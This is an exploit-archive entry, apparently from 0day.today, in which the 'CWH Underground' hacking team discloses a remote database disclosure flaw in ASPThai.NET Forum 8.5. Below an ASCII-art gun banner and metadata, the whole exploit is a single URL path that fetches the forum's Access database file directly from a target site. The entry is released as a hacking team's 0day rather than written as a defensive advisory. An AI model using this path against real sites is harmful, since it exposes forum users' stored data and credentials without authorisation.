id: 4313
date: 11/29/2008
title: ASPThai.NET Forum 8.5 Remote Database Disclosure Vulnerability
author: CWH Underground
cves: 

==============================================================
ASPThai.NET Forum 8.5 Remote Database Disclosure Vulnerability
==============================================================


==================================================================
  ASPThai.NET Forum 8.5 Remote Database Disclosure Vulnerability
==================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 29 November 2008


#####################################################
 APPLICATION : ASPThai.NET Forum
 VERSION     : 8.5
 VENDOR	     : www.aspthai.net
#####################################################

http://[Target]/database/aspthaiForum.mdb



#  0day.today [2023-03-24]  #